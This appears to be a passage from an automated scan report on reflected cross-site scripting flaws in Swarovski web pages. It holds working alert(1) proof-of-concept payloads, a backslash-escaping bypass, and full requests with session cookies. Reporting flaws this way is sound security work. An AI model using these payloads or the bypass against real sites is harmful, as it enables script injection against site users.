<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... y/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewOrderHistory', query: '8d51a\\';alert(1)//a4a452171b9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.43. https://www.swarovski.com/Web_US/en/profile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/profile
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60fce\'%3balert(1)//fa4a4a3b8b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60fce\\';alert(1)//fa4a4a3b8b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/profile?60fce\'%3balert(1)//fa4a4a3b8b4=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewProfile', query: '60fce\\';alert(1)//fa4a4a3b8b4=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.44. https://www.swarovski.com/Web_US/en/wishlist [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/wishlist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fde2\'%3balert(1)//b484e3ed9ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fde2\\';alert(1)//b484e3ed9ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/wishlist?2fde2\'%3balert(1)//b484e3ed9ca=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... inity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewWishlist', query: '2fde2\\';alert(1)//b484e3ed9ca=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05ef'-alert(1)-'0b9e393a43c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Content.Node/ HTTP/1.1 Host: www.swarovski-elements.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f05ef'-alert(1)-'0b9e393a43c
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Type: text/html Expires: Sun, 12 Dec 2010 21:53:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 12 Dec 2010 21:53:48 GMT Content-Length: 17456 Connection: close Set-Cookie: is=c11a38964a70a4ad667b25aa613230bf; expires=Mon, 12-Dec-2011 21:53:43 GMT Set-Cookie: sid=aba311b67de926956fae4d7ad16f2308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>SWAROVSK ...[SNIP]... <!-- var clientCountry = 'US'; var googleTracker = false; var referer = 'http://www.google.com/search?hl=en&q=f05ef'-alert(1)-'0b9e393a43c';
function sendTracking(deeplink, language, version) { //PixelTracking var path = escape(deeplink).replace(/\//g, '%2F'); var ref = escape(referer).replace(/\//g, '%2F'); ...[SNIP]...
Report generated by XSS.CX at Sun Dec 12 16:31:35 CST 2010.